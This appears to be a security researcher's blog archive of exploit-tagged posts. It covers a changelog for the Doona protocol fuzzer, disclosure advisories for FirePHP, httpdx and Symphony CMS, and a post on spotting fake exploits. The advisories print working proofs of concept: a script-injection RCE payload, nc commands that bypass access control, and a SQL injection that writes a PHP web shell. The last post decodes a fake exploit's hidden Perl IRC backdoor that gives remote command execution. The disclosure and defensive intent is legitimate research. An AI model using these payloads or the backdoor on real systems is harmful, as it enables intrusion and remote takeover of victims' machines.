Results tagged “exploit” from Just Another Hacker

Doona - network protocol fuzzer

Doona is a fork of the Bruteforce Exploit Detector, it was renamed to avoid confusion as it has a large number of of changes. You should get a copy from github if you want to try it:

It's currently a little short on documentation, so I will let the changelog details some of the many differences between Doona and BED:

[ 0.7 ]
- resolved the need for a hardcoded plugin list
- added max requests option to allow parallel execution (easier than hacking in thread support)
- added sigpipe handler to prevent silent exit if server unexpectedly closes the connection
- added http proxy module
- added more ftp test cases
- added more rtsp test cases
- added more http test cases
- added more irc test cases
- fixed a long standing BED bug where two test strings where accidentally concatenated
- fixed a long standing BED bug where a hex representation of a 32bit integer was not max value as intended
- aliased -m to -s (-s is getting deprecated/reassigned)
- renamed plugins to modules (-m is for module)
- removed directory traversal testing code from ftp module
- rewrote/broke misc testing procedure to test specific edge cases, needs redesign
- added support for multiple setup/prefix/verbs, ie: fuzzing Host headers with GET/POST/HEAD requests
- fixed long standing BED bug in the smtp module where it wouldn't greet the mail server correctly with HELO
- added more smtp test cases
- fixed long standing BED bug in escaped Unicode strings
- added more large integer and formatstring fuzz strings
- fixed column alignment in the progress output

[ 0.6 first doona release ]
- added rtsp module
- added tftp module
- added whois module
- added more irc test cases
- added more finger test cases
- added more http test cases
- added more ftp test cases
- added progress indicator count to fuzz cases
- added resume feature (uses test case number)
- added crash indicators for test case number
- added signal handlers (displays testcase number on crtl^c or kill)
- added feature to dump what a test case number would send
- ftp module now uses anonymous login if username password not provided
- changed the order test cases are executed to allow corner cases to be tested earlier
- changed diagnostic output
- new and improved help text
- some code cleanup

20130417 - : FirePHP firefox plugin remote code execution
JAHx132 -

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: ]

--- Vulnerability description ---
The extension does not sufficiently validate cell names in array data received from the remote 
host resulting in arbitrary script execution in the chrome privileged context if a user
inspects the malicious data in firephp.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP -
Affected versions: All versions prior to 0.7.2

--- Proof of Concept ---
 * FirePHP Firefox plugin Remote code execution PoC                            *
 * Written by Wireghoul -   *
 * Greetz to @bcoles urbanadventurer @malerisch              *

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\";1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\";1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= ',[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
  <title>FirePHP Firefox plugin RCE PoC</title>

--- Solution ---
Upgrade to version 0.7.2

--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledge vulnerability
09-Apr-2013 - Vendor notified through email

20130212 - : httpdx multiple access control bypass
JAHx131 -

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: ]

--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            realm="Stuff for admin only!"
As long as your request does not match these static strings, but the path resolves to the same
files you can access the content.

Additionally, as the server doesn't support traditional binding of virtualhosts to network
interfaces you must configure virtualhost specific behaviour through similar string matching
    if<%HTTP_HOST% != "" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the
localhost virtualhost remotely, just set your Host: header to localhost.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx -
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.

--- Solution ---
The software appears to be abandoned and the same versions suffers from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

20121017 - : Symphony cms - Multiple vulnerabilities
JAHx122 -

Symphony is an XSLT-powered open source content management system.
[ Taken from: ]

--- Vulnerability description ---
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in
severity from low to high and can result in complete compromise by an
unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony -
Affected versions: 2.3 (and possibly earlier)

--- Local patch disclosure ---
Direct requests to library files will disclose the full local file path if php is configured
to display errors due to the reliance on the library path being declared in a constant
of global scope outside of the library script.


--- User enumeration ---
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table an attacker can login to their account by brute forcing a key of [0-9A-F]^8 length.

The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/ for the user "admin" with password "admin".

--- Cross site scripting ---
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

Submit form with email address:

The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.


The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded resulting in persistent cross site scripting.


--- Blind sql injection ---
The username field in the authors detail page is not sufficiently filtered when checking
is the username already exists in the system. Resulting in blind sql injection.

Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email

Quick and dirty exploit vetting

Got some exploit code that you didn't write? You had better check it first. Especially as I've seen a few people link to fake exploits lately. One example is the supposed winnuker from Which sports the following payload:

Never run an exploit if you didn't write it or don't understand the shellcode. I cannot stress that enough. Anyway, the exploit code has a bad smell to it, so I do a lazy check of the shell code:
~$ echo -e "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
$chan="#darknet";$nick="moron";$server="";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
If you work with hex or shellcode regularly you might have already worked out that the shellcode was in fact text (the large number of \x20 is a pretty dead giveaway). As you can see a quick check of the shellcode reveals that this is in fact a fake exploit that offers a remote shell to the entire efnet #darknet channel. If the shellcode is binary then you'll need to do some more analysis, but for most fake exploits the above technique usually reveals them.
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.